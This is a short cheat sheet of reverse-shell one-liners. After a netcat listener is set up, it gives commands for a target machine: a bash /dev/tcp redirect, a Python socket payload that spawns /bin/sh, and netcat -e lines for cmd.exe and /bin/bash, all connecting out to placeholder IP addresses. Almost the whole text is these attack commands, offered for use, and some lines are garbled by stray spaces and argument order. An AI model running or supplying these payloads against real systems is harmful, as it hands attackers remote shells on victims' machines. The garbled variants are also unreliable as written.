First in the server listens: nc 12345 -lvvp
Then do the following in the target machine
liunx client machine:
bash -i> & / dev / tcp / ip / port 0> & 1
Example:
bash -i >& /dev/tcp/120.120.120.120/12345 0>&1
python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("100.100.100.100",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc
nc -e cmd.exe 100.100.100.100 12345 (Windows)
nc -e / bin / bash 100.100.100.100 12345 (Linux)